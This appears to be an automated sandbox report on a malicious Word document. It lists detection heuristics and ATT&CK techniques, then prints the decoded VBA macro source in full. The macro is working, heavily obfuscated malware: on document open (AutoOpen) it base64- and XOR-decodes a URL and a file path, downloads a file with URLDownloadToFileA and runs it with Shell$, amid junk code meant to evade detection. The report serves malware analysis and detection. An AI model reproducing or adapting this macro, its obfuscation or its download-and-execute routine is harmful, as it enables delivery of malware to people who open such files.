MALICIOUS
Risk Score: 292
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code when the document is opened. The macro uses the URLDownloadToFileA API to download a payload from a URL, which indicates an Ingress Tool Transfer attack pattern. The specific URL used for the download is 'http://schemas.openxmlformats.org/drawingml/2006/main'. Although this URL is marked as benign, the presence of the download function is highly suspicious.
Heuristics 9
- ClamAV: Doc.Macro.Obfuscated-6397052-2 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD)
  Reference to URLDownloadToFile API
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
  Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Potential Shell call in VBA. Matched line in script:
      pWnfWoOVygU = OZxIAzBQlKxtbGzYPN(0, VWSWKMPYtattOHpeXW(fCQsxwCiVLkowSq, "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE"), xAxvNftvdCMkk, 0, 0)
      Shell$ xAxvNftvdCMkk
      End Sub
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD)
  URLDownloadToFile in VBA. Matched line in script:
      Private Declare PtrSafe Function OZxIAzBQlKxtbGzYPN Lib "urlmon" Alias _
      "URLDownloadToFileA" (ByVal tBvjjqcoVinerPY As Long, _
      ByVal DoyTNEzoLpqBDiLEAN As String, _
- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  AutoOpen macro. Matched line in script:
      ByVal WIAMhCIIdWO As Long) As Long
      Sub AutoOpen()
      Dim ccHQoBknRTTxCv As Integer
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17608 bytes |

SHA-256: bd795f83e95a79fb3badddf9c19090664262c051e939f3fcc3f6232f7f4bf39f
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 233 of 315 identifiers look randomly generated (e.g. 'YHJocENZCnEcB08hGk8KJRFP') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZwkoRPuEOeLkyd"
Option Explicit
Private Declare PtrSafe Function OZxIAzBQlKxtbGzYPN Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal tBvjjqcoVinerPY As Long, _
ByVal DoyTNEzoLpqBDiLEAN As String, _
ByVal MCdMefhZWlyFUYXWIc As String, _
ByVal mXeRtMrpBUgkHhqy As Long, _
ByVal WIAMhCIIdWO As Long) As Long
Sub AutoOpen()
Dim ccHQoBknRTTxCv As Integer
ccHQoBknRTTxCv = 1 - 9 * 7
Dim xAxvNftvdCMkk As String: xAxvNftvdCMkk = VWSWKMPYtattOHpeXW(IMkIsXtByMF("KVE6OQAEGBozGjwtPy0lHSUoRSFMBkE4EQ=="), "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE")
Dim ZBxthpHgVGq: ZBxthpHgVGq = Array("AtkyUiYHncKIfxqTf")
Dim pWnfWoOVygU
Dim McNliAvtyhdTSKmEuCz As Integer
McNliAvtyhdTSKmEuCz = 9
Dim EVLgDNRXRYFTYNeRSw As Integer
EVLgDNRXRYFTYNeRSw = 4
Dim XGnGLmaIAZad, obRcZsSgyTtkawK As Integer
XGnGLmaIAZad = 5
obRcZsSgyTtkawK = 51
While XGnGLmaIAZad < obRcZsSgyTtkawK
obRcZsSgyTtkawK = obRcZsSgyTtkawK - XGnGLmaIAZad
Wend
If EVLgDNRXRYFTYNeRSw < Len(Application.UserName) Then
Dim yOgWmRaYvwKaM: yOgWmRaYvwKaM = Array("EXQXSUUFAYQRX""ewHCrGYsgOZWUr""effhVQquJrCnxjrdRc""DWbNHjQKAXDHobL""AtrKSIBcglIERam""tmnuzVYrTZhZtZPY""TSyjTDnMsfdSxcg""ZwcQItyWYctJsX""gKHOqePxhryX")
Dim ZKUPmlbgFlCKF As Variant
End If
If McNliAvtyhdTSKmEuCz < Len(Application.UserName) Then
Dim SbGMutmffRyDZdjso As Integer
SbGMutmffRyDZdjso = 7
Dim CCCWuCkIQHViHXuZF: CCCWuCkIQHViHXuZF = Array("ucmwPHXQAdWOlN""LAIOIMyEGEmmpkUq""AwwhBAKgTZxLATd""AubDhDpqIjUfghCcom""FISDdGFmTfWITQn""QSNlBqlIgnfNxxH""TVlipfDpGsXRMsyY""KGsOPBvZEgU""LeuykfCKOwthgwn")
If SbGMutmffRyDZdjso < Len(Application.UserName) Then
Dim SLBkqnDXBbTB: SLBkqnDXBbTB = Array("syzjBCjWvmqN""mmnfaxBnDUouhKWu""IcRGOBaKOcks""vbjtOstywkMTxJpuWZ")
Dim YXMbiLJHmxpDw As Variant
End If
Dim swYbBTnacXvjHdNhsYE As Variant
End If
Dim fCQsxwCiVLkowSq As String: fCQsxwCiVLkowSq = IMkIsXtByMF("Ah8SHElORVhXf2d+YHJocENZCnEcB08hGk8KJRFP")
Dim tCEpcYKnRhwWjlwNzu, bheTCBlHesqBEtgXqZy As Integer
For bheTCBlHesqBEtgXqZy = 0 To 2
tCEpcYKnRhwWjlwNzu = tCEpcYKnRhwWjlwNzu + bheTCBlHesqBEtgXqZy
Next bheTCBlHesqBEtgXqZy
pWnfWoOVygU = OZxIAzBQlKxtbGzYPN(0, VWSWKMPYtattOHpeXW(fCQsxwCiVLkowSq, "jkflsajioJIOSDFAti$@*($@t($@i*t$@I924U90G42i*g@$(gsg(sdf(G4UJPIOGDE09GERUJKLSDGFJIO4TU0924T(@$i*g$i*greiiUJ9G3402--23U9RGEU9SRGJLKDFM,.CXVBNM,.DFGS;KLDFGSHJKLUI3T4*y#$%*y%#ugtreufusdJKLSFGDIO34G9HIOBNFJKDXCVHUJDFGSHUIOGRE"), xAxvNftvdCMkk, 0, 0)
Shell$ xAxvNftvdCMkk
End Sub
Public Function IMkIsXtByMF(kLpsvZAaOnUS As String, Optional BFCFxTCsxodMVpTegYo As Boolean = True) As String
Dim fXGWIOfuGFVidrMtfiG, tCMXisuWqWrmbg As Integer
For tCMXisuWqWrmbg = 0 To 4
fXGWIOfuGFVidrMtfiG = fXGWIOfuGFVidrMtfiG + tCMXisuWqWrmbg
Next tCMXisuWqWrmbg
Static VGGCuIQHgZcHy(0 To 255) As Byte
Dim CvFeUcTaTPYQRdDsvT As Integer
CvFeUcTaTPYQRdDsvT = 8
Dim HlxJCcNgjsSXwzut As Integer
HlxJCcNgjsSXwzut = 7 - 2 * 3
If CvFeUcTaTPYQRdDsvT < Len(Application.UserName) Then
Dim BUKqfzfNUrel, DYRaPhUkCfVztAuuWiN As Integer
BUKqfzfNUrel = 7
DYRaPhUkCfVztAuuWiN = 34
While BUKqfzfNUrel < DYRaPhUkCfVztAuuWiN
DYRaPhUkCfVztAuuWiN = DYRaPhUkCfVztAuuWiN - BUKqfzfNUrel
Wend
Dim wLtujnkDgdZlnRLAUEg As Variant
End If
Dim WnfCOlSVBDUogFFBZG() As Byte, wxQGCyuBQnqlzN() As Byte
Dim SxQBGGvFBhgfHtDZab As Integer
SxQBGGvFBhgfHtDZab = 3 - 1 * 2
Dim ALWEAcUFnwB As Long, fyBQRYCudlsdhB As Long
Dim gkXnnsVlxHAKuRaki As Integer
gkXnnsVlxHAKuRaki = 4 - 7 * 1
If VGGCuIQHgZcHy(0) = 0 Then
Dim HCwNDRiRvMlNfKNQJV As Integer
HCwNDRiRvMlNfKNQJV = 5
Dim PNgFqsxapeYDAgNSQ As Integer
PNgFqsxapeYDAgNSQ = 2
Dim dtExBYJNGtokVosyuh As Integer
dtExBYJNGtokVosyuh = 2
Dim onImPpBRvzyMrBX, AfSQzUUDDGXACybii As Integer
For AfSQzUUDDGXACybii = 0 To 7
onImPpBRvzyMrBX = onImPpBRvzyMrBX + AfSQzUUDDGXACybii
Next AfSQzUUDDGXACybii
If dtExBYJNGtokVosyuh < Len(Application.UserName) Then
Dim KTtMqLUssSwoF As Integer
KTtMqLUssSwoF = 1 - 3 * 5
Dim FvedUIkTexPzTpaOXDO As Variant
End If
If PNgFqsxapeYDAgNSQ < Len(Application.UserName) Then
Dim udKBhPnXkwPFxXqMY, KrgzqmtEeWAfKvjt As Integer
For KrgzqmtEeWAfKvjt = 0 To 1
udKBhPnXkwPFxXqMY = udKBhPnXkwPFxXqMY + KrgzqmtEeWAfKvjt
Next KrgzqmtEeWAfKvjt
Dim ccXdXFpntqxnZpMCfB As Variant
End If
If HCwNDRiRvMlNfKNQJV < Len(Application.UserName) Then
Dim vgsDdSCpnrpTfIvD: vgsDdSCpnrpTfIvD = Array("fIuPIdtvgtVGyuOpZ""UUxZqYNtWEOni""WSAyCkHgsDL""kOIXYmQwHqWbGh")
Dim JZzELENIkUEaGjRc As Variant
End If
For ALWEAcUFnwB = 0 To 255
Dim jlOIIymwkgRNoM, GCKEDFDjShLIPVeK As Integer
For GCKEDFDjShLIPVeK = 0 To 4
jlOIIymwkgRNoM = jlOIIymwkgRNoM + GCKEDFDjShLIPVeK
Next GCKEDFDjShLIPVeK
VGGCuIQHgZcHy(ALWEAcUFnwB) = 255
Dim ZtKQiadNuAsCPANDzRM As Integer
ZtKQiadNuAsCPANDzRM = 1 - 9 * 9
Next ALWEAcUFnwB
Dim SjZsJORkTlwNpQxi As Integer
SjZsJORkTlwNpQxi = 5 * 2
For ALWEAcUFnwB = 0 To 25
Dim CUrOwwrUWkFAsSP As Integer
CUrOwwrUWkFAsSP = 8
Dim RTtsLLXTgKdPhrTAp As Integer
RTtsLLXTgKdPhrTAp = 2 - 1 * 5
If CUrOwwrUWkFAsSP < Len(Application.UserName) Then
Dim EdGELopDiCcOqdVzP As Integer
EdGELopDiCcOqdVzP = 6
Dim myfnwbWZuCuAE, AXUVxszNUqzu As Integer
myfnwbWZuCuAE = 5
AXUVxszNUqzu = 62
While myfnwbWZuCuAE < AXUVxszNUqzu
AXUVxszNUqzu = AXUVxszNUqzu - myfnwbWZuCuAE
Wend
If EdGELopDiCcOqdVzP < Len(Application.UserName) Then
Dim PgMHrDqWQgV As Integer
PgMHrDqWQgV = 4
Dim BJavaplHFwfw As Integer
BJavaplHFwfw = 4 - 9 * 4
If PgMHrDqWQgV < Len(Application.UserName) Then
Dim iujlbVAYpRA As Collection
Set iujlbVAYpRA = New Collection
iujlbVAYpRA.Add "gDhsxUrBFXhsSucDL"
iujlbVAYpRA.Add "eLeVIQeeJrgzef"
iujlbVAYpRA.Add "idTAZUZCKTmpR"
iujlbVAYpRA.Add "VTIMfxGDNJCwEhc"
iujlbVAYpRA.Add "fMwLLWGGmJJ"
iujlbVAYpRA.Add "XYJWkUJbOATOQ"
iujlbVAYpRA.Add "eSIkOykCVRiWli"
iujlbVAYpRA.Add "nNTCAwlZaGGefnbJr"
Dim stQcyTrGjYKLBhB As Variant
End If
Dim JtAQXkXhIslG As Variant
End If
Dim FlxMTaitOtZegQjjw As Variant
End If
VGGCuIQHgZcHy(ALWEAcUFnwB + 65) = ALWEAcUFnwB
Next ALWEAcUFnwB
For ALWEAcUFnwB = 26 To 51
VGGCuIQHgZcHy(ALWEAcUFnwB + 71) = ALWEAcUFnwB
Dim UKetPrWLfVbf As Integer
UKetPrWLfVbf = 6 - 7 * 7
Next ALWEAcUFnwB
Dim SBCJFfjygSHA As Integer
SBCJFfjygSHA = 7 * 9
For ALWEAcUFnwB = 52 To 61
VGGCuIQHgZcHy(ALWEAcUFnwB - 4) = ALWEAcUFnwB
Dim xbedXhTZBdp As Integer
xbedXhTZBdp = 4 - 8 * 8
Next ALWEAcUFnwB
Dim JoUwumHaEBqVlSxuQU As Integer
JoUwumHaEBqVlSxuQU = 7 * 1
VGGCuIQHgZcHy(43) = 62
Dim FmWMoJMgeGIeSMw As Integer
FmWMoJMgeGIeSMw = 5 - 7 * 1
VGGCuIQHgZcHy(47) = 63
Dim mpFzoKdcaZFJXBqKb: mpFzoKdcaZFJXBqKb = Array("volIppkxnClHFKHRU")
End If
Dim sGQihnRZZWgBwvpd, HywpCWJWXcIRVP As Integer
sGQihnRZZWgBwvpd = 3
HywpCWJWXcIRVP = 78
While sGQihnRZZWgBwvpd < HywpCWJWXcIRVP
HywpCWJWXcIRVP = HywpCWJWXcIRVP - sGQihnRZZWgBwvpd
Wend
If kLpsvZAaOnUS = "" Then Exit Function
Dim HHrCMajdgVSOQzOh As Integer
HHrCMajdgVSOQzOh = 4
Dim GvCDPgxwGMtEX, wxKvbqGlqzHUCPA As Integer
For wxKvbqGlqzHUCPA = 0 To 8
GvCDPgxwGMtEX = GvCDPgxwGMtEX + wxKvbqGlqzHUCPA
Next wxKvbqGlqzHUCPA
If HHrCMajdgVSOQzOh < Len(Application.UserName) Then
Dim JexJiWILueKd As Integer
JexJiWILueKd = 2 * 7
Dim ZgecAlgyJhKa As Variant
End If
kLpsvZAaOnUS = Trim(kLpsvZAaOnUS)
Dim hPNuebkGpIPn As Integer
hPNuebkGpIPn = 2 - 6 * 8
If BFCFxTCsxodMVpTegYo Then
Dim SbZZyVjEwaUj As Integer
SbZZyVjEwaUj = 2 - 1 * 2
For ALWEAcUFnwB = 0 To 255
Dim psuapxycOUruKlp, OOevKxrSIUxgJQx As Integer
For OOevKxrSIUxgJQx = 0 To 8
psuapxycOUruKlp = psuapxycOUruKlp + OOevKxrSIUxgJQx
Next OOevKxrSIUxgJQx
If Not (Chr(ALWEAcUFnwB) Like "[A-Za-z0-9+/=]") Then
Dim eXCiZNFfutlEiLoMU, vsjlrJOEsLKXTe As Integer
eXCiZNFfutlEiLoMU = 2
vsjlrJOEsLKXTe = 28
While eXCiZNFfutlEiLoMU < vsjlrJOEsLKXTe
vsjlrJOEsLKXTe = vsjlrJOEsLKXTe - eXCiZNFfutlEiLoMU
Wend
kLpsvZAaOnUS = Replace(kLpsvZAaOnUS, Chr(ALWEAcUFnwB), "")
Dim tdiOYsDiYxyn As Integer
tdiOYsDiYxyn = 7 - 9 * 7
End If
Dim zQdfxochjhOTlus As Integer
zQdfxochjhOTlus = 3 - 4 * 8
Next ALWEAcUFnwB
Dim rqgAlIXqlXjnBSdqE As Integer
rqgAlIXqlXjnBSdqE = 1 * 5
End If
Dim jLNOxvVMhIOHoq As Integer
jLNOxvVMhIOHoq = 8 - 6 * 5
wxQGCyuBQnqlzN() = StrConv(kLpsvZAaOnUS, vbFromUnicode)
Dim lklSdXABdXpVgg As Integer
lklSdXABdXpVgg = 4 - 8 * 5
ReDim WnfCOlSVBDUogFFBZG(0 To ((Len(kLpsvZAaOnUS) \ 4) * 3 - 1))
Dim peYrbpWAUORd: peYrbpWAUORd = Array("CxXJIJfKRGawjLgXPc")
For ALWEAcUFnwB = 0 To Len(kLpsvZAaOnUS) \ 4 - 2
Dim ZVEgKLzFerBimZkVtE As Integer
ZVEgKLzFerBimZkVtE = 6
Dim PXhptxCSHYxDlRUEyx, aiGBePOCIPKyAlSoIF As Integer
For aiGBePOCIPKyAlSoIF = 0 To 8
PXhptxCSHYxDlRUEyx = PXhptxCSHYxDlRUEyx + aiGBePOCIPKyAlSoIF
Next aiGBePOCIPKyAlSoIF
If ZVEgKLzFerBimZkVtE < Len(Application.UserName) Then
Dim fyNGUEfomtNFm As Integer
fyNGUEfomtNFm = 4 - 4 * 7
Dim UyRAvFhctyeGKhLb As Variant
End If
fyBQRYCudlsdhB = VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3))
Dim MGjrXkmuHJSRSGZVON: MGjrXkmuHJSRSGZVON = Array("JIXOYzMirsr""wGNLJkSHbmRC""ILDUXZwiLnSOm""dNOuatvyBXMxEu")
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) * &H40&)
Dim TDxQNcaraDUoreGsBV, fEUZxUvEndQouc As Integer
TDxQNcaraDUoreGsBV = 4
fEUZxUvEndQouc = 27
While TDxQNcaraDUoreGsBV < fEUZxUvEndQouc
fEUZxUvEndQouc = fEUZxUvEndQouc - TDxQNcaraDUoreGsBV
Wend
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) * &H1000&)
Dim hMOyvfmojOnokiqe: hMOyvfmojOnokiqe = Array("xKMmhAtLkJZ""JgPnzBDAAxVEIBll""LCFSzqqNKTn""xKGbgWqISYLt""FaXoHOLJsIaMxsReA""xFKbhaDmQbYUgJDQvx")
fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) * &H40000)
Dim fxiWDCkZjxmeioVKlZ As Collection
Set fxiWDCkZjxmeioVKlZ = New Collection
fxiWDCkZjxmeioVKlZ.Add "byRFegpiphWnYpPqX"
fxiWDCkZjxmeioVKlZ.Add "pUgxNuAKmEtdrD"
fxiWDCkZjxmeioVKlZ.Add "eCaaoWjiKIOtV"
fxiWDCkZjxmeioVKlZ.Add "PgjnhoYdFGXaa"
fxiWDCkZjxmeioVKlZ.Add "lqrZDZDyPpHk"
fxiWDCkZjxmeioVKlZ.Add "FbrknsMRqnOz"
fxiWDCkZjxmeioVKlZ.Add "KoVyJxSZWob"
fxiWDCkZjxmeioVKlZ.Add "erYJEZDTiAhib"
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 0) = (fyBQRYCudlsdhB And &HFF0000) \ &H10000
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 1) = (fyBQRYCudlsdhB And &HFF00&) \ &H100&
Dim ZbjFypJOKbrBWQmH: ZbjFypJOKbrBWQmH = Array("DnNOvpCYZPCDDzmFo""JzFldzfAdXZNHGpLq""oHdRqWYwrcpvswtxKX""dJQoturTpKEM""NLSOuJzzmRS""dFYnerfupkzFzXuI")
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 2) = fyBQRYCudlsdhB And &HFF&
Dim MHZmuWEuHpOwYAv, ZuCyJIYJZOqpnNGq As Integer
For ZuCyJIYJZOqpnNGq = 0 To 5
MHZmuWEuHpOwYAv = MHZmuWEuHpOwYAv + ZuCyJIYJZOqpnNGq
Next ZuCyJIYJZOqpnNGq
Next ALWEAcUFnwB
Dim nbTjdprgABlpEN, TFpTfswoxIPXitrRWYS As Integer
For TFpTfswoxIPXitrRWYS = 0 To 9
nbTjdprgABlpEN = nbTjdprgABlpEN + TFpTfswoxIPXitrRWYS
Next TFpTfswoxIPXitrRWYS
fyBQRYCudlsdhB = 0
Dim dTSyXKVYZqZRP As Integer
dTSyXKVYZqZRP = 1 * 6
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3)) <> 255 Then fyBQRYCudlsdhB = VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 3))
Dim YFSlPLvaoHhIRyf, TgbyIScCPLp As Integer
For TgbyIScCPLp = 0 To 6
YFSlPLvaoHhIRyf = YFSlPLvaoHhIRyf + TgbyIScCPLp
Next TgbyIScCPLp
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 2)) * &H40&)
Dim rvTKREKMQDpE: rvTKREKMQDpE = Array("uGHTNKwNQIoKSVIpzw""eBpqXCzidAPuUt""PlnoQuguXalmLjsHaF""SrNadaNRmjtp""CQpEYGuxnyw""AuzbBhgfOuCgjg""BWpcXZNSYDtybRGN""pVPZxbzpNSbfWrgMLbJ")
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 1)) * &H1000&)
Dim LNTqUyKaSlwsykJNGAW As Integer
LNTqUyKaSlwsykJNGAW = 7
Dim EPkLGnSscPzky, AkBnNCSXXpsUZMjZ As Integer
EPkLGnSscPzky = 7
AkBnNCSXXpsUZMjZ = 24
While EPkLGnSscPzky < AkBnNCSXXpsUZMjZ
AkBnNCSXXpsUZMjZ = AkBnNCSXXpsUZMjZ - EPkLGnSscPzky
Wend
If LNTqUyKaSlwsykJNGAW < Len(Application.UserName) Then
Dim oCKEIpdWDZqBR: oCKEIpdWDZqBR = Array("zKoxdpttcvjiPZZY""lYrjnqGQqOtyXe""BlLlwyDQizcnj""mxhYvjmkCIP""QOJFrFjFmwfVpGB""rLXhYkWayEdeQFgi""qbhwVkmHcXIhTYNRiq""AodSXgHtHCRpMU")
Dim YmZqfAbbRjg As Variant
End If
If VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) <> 255 Then fyBQRYCudlsdhB = fyBQRYCudlsdhB Or (VGGCuIQHgZcHy(wxQGCyuBQnqlzN(ALWEAcUFnwB * 4 + 0)) * &H40000)
Dim qCJsCvfeoitfsgDg: qCJsCvfeoitfsgDg = Array("MxhfaXBUopkI""RNreNhXYxBUhjq""NQUVQTNBfxqCWgpiBv""lxLeHiZkBvwYQM""huenrApjUayipLn")
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 0) = (fyBQRYCudlsdhB And &HFF0000) \ &H10000
Dim GyMKgdBbnuObkHbJ As Integer
GyMKgdBbnuObkHbJ = 7 * 1
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 1) = (fyBQRYCudlsdhB And &HFF00&) \ &H100&
Dim SmFFHGGEQsbRlm As Integer
SmFFHGGEQsbRlm = 7 - 5 * 1
WnfCOlSVBDUogFFBZG(ALWEAcUFnwB * 3 + 2) = fyBQRYCudlsdhB And &HFF&
If wxQGCyuBQnqlzN(UBound(wxQGCyuBQnqlzN) - 1) = 61 Then
Dim DSzCXpYxCuOGs, rcECvohWHopXAM As Integer
DSzCXpYxCuOGs = 6
rcECvohWHopXAM = 82
While DSzCXpYxCuOGs < rcECvohWHopXAM
rcECvohWHopXAM = rcECvohWHopXAM - DSzCXpYxCuOGs
Wend
IMkIsXtByMF = Left(StrConv(WnfCOlSVBDUogFFBZG, vbUnicode), UBound(WnfCOlSVBDUogFFBZG) - 1)
Dim WHTsfIRKqKqjFkZNjM As Integer
WHTsfIRKqKqjFkZNjM = 7
Dim loYjYvcivGRqlh As Integer
loYjYvcivGRqlh = 1 - 9 * 1
If WHTsfIRKqKqjFkZNjM < Len(Application.UserName) Then
Dim GegTpOraDngTyjrx As Variant
End If
ElseIf wxQGCyuBQnqlzN(UBound(wxQGCyuBQnqlzN)) = 61 Then
IMkIsXtByMF = Left(StrConv(WnfCOlSVBDUogFFBZG, vbUnicode), UBound(WnfCOlSVBDUogFFBZG) - 0)
Else
Dim PkETfgXcJKQ, gwZrjHgrUTdIfHTSuWE As Integer
For gwZrjHgrUTdIfHTSuWE = 0 To 8
PkETfgXcJKQ = PkETfgXcJKQ + gwZrjHgrUTdIfHTSuWE
Next gwZrjHgrUTdIfHTSuWE
IMkIsXtByMF = StrConv(WnfCOlSVBDUogFFBZG, vbUnicode)
Dim TZfjRQOgQZvlaxipUar: TZfjRQOgQZvlaxipUar = Array("ohufxjtKukgH""lVhtsREXOkdPO")
End If
End Function
Public Function VWSWKMPYtattOHpeXW(ByRef TFqhqLFzwNylKPtFiz As String, ByRef fmBORyvoaQbvJmQMz As String) As String
Dim jfZYCmPNAVwnzvCD, eDmMCAhPxIUrIPrY As Integer
jfZYCmPNAVwnzvCD = 2
eDmMCAhPxIUrIPrY = 88
While jfZYCmPNAVwnzvCD < eDmMCAhPxIUrIPrY
eDmMCAhPxIUrIPrY = eDmMCAhPxIUrIPrY - jfZYCmPNAVwnzvCD
Wend
Dim tZmpsnVqXaP() As Byte, tknZhsBWZnMrGObBo() As Byte, yufAzYzaZzIcO As Long, cJcnnPQwsTOWE As Long, BwSfbkHUTjJH As Long, kLpsvZAaOnUS As Long
Dim OYlpgkSZHJsssedGK As Integer
OYlpgkSZHJsssedGK = 3 * 6
tZmpsnVqXaP = StrConv(TFqhqLFzwNylKPtFiz, vbFromUnicode)
tknZhsBWZnMrGObBo = StrConv(fmBORyvoaQbvJmQMz, vbFromUnicode)
Dim acUZRPpuPGSgPyKZ, WYeyAUebLzQ As Integer
acUZRPpuPGSgPyKZ = 5
WYeyAUebLzQ = 32
While acUZRPpuPGSgPyKZ < WYeyAUebLzQ
WYeyAUebLzQ = WYeyAUebLzQ - acUZRPpuPGSgPyKZ
Wend
yufAzYzaZzIcO = UBound(tZmpsnVqXaP)
Dim LaAVeVNCzoRfPcq As Integer
LaAVeVNCzoRfPcq = 8 - 3 * 2
cJcnnPQwsTOWE = UBound(tknZhsBWZnMrGObBo)
Dim lmbPdXpLWjQKJ, MRzEluliKrtd As Integer
For MRzEluliKrtd = 0 To 5
lmbPdXpLWjQKJ = lmbPdXpLWjQKJ + MRzEluliKrtd
Next MRzEluliKrtd
For BwSfbkHUTjJH = 0 To yufAzYzaZzIcO
Dim vKcEpSnMOhvVVGVxdq As Integer
vKcEpSnMOhvVVGVxdq = 2
Dim FqmJVrqZDQy As Collection
Set FqmJVrqZDQy = New Collection
FqmJVrqZDQy.Add "kIKDSyooLABxXYv"
FqmJVrqZDQy.Add "MJNysgmzskyzpGwSt"
FqmJVrqZDQy.Add "fhcrescYEZNq"
FqmJVrqZDQy.Add "GMAoRqOlxyKgvn"
FqmJVrqZDQy.Add "TnGFSHAkVEzkETh"
FqmJVrqZDQy.Add "huBMUkEObQjsM"
FqmJVrqZDQy.Add "zKxOZZLRvgAQqYU"
FqmJVrqZDQy.Add "ncFlenIAGLE"
If vKcEpSnMOhvVVGVxdq < Len(Application.UserName) Then
Dim PkwhxOJKAzOtrtEGFaR As Integer
PkwhxOJKAzOtrtEGFaR = 7 * 1
Dim zOWEHAEyullrmxYDcBM As Variant
End If
tZmpsnVqXaP(BwSfbkHUTjJH) = tZmpsnVqXaP(BwSfbkHUTjJH) Xor tknZhsBWZnMrGObBo(kLpsvZAaOnUS)
Dim MUDsEkQKuNeQiyvECI As Integer
MUDsEkQKuNeQiyvECI = 4 * 1
If kLpsvZAaOnUS < cJcnnPQwsTOWE Then
kLpsvZAaOnUS = kLpsvZAaOnUS + 1
Else
Dim AecHGNEjAhlXJAlDJA As Integer
AecHGNEjAhlXJAlDJA = 8 * 4
kLpsvZAaOnUS = 0
Dim NBvQfjcCSGT As Integer
NBvQfjcCSGT = 2 * 9
End If
Dim aoFvIukXkPlhNNFFwv: aoFvIukXkPlhNNFFwv = Array("IeqOSsNRlhLRwhMaG""VbknkFevsBmcUsN""ECQmOLEAWwu""ZGdeCreWfWKGjIhrPjm""goyAuInSeFHkPyCk""vZkSkRQkdOe")
Next BwSfbkHUTjJH
Dim sSfdIiqDBQCWT, ogzFkEasMihQU As Integer
For ogzFkEasMihQU = 0 To 3
sSfdIiqDBQCWT = sSfdIiqDBQCWT + ogzFkEasMihQU
Next ogzFkEasMihQU
VWSWKMPYtattOHpeXW = StrConv(tZmpsnVqXaP, vbUnicode)
End Function
Attribute VB_Name = "ZhjKqcXuixfG"
Attribute VB_Base = "0{DEA8588D-7CB0-4728-BFC1-4EFA34A8DD63}{41D2E52E-A43B-43C8-8884-7AA2FA11E92E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function edIfCsfPNNFA() As String
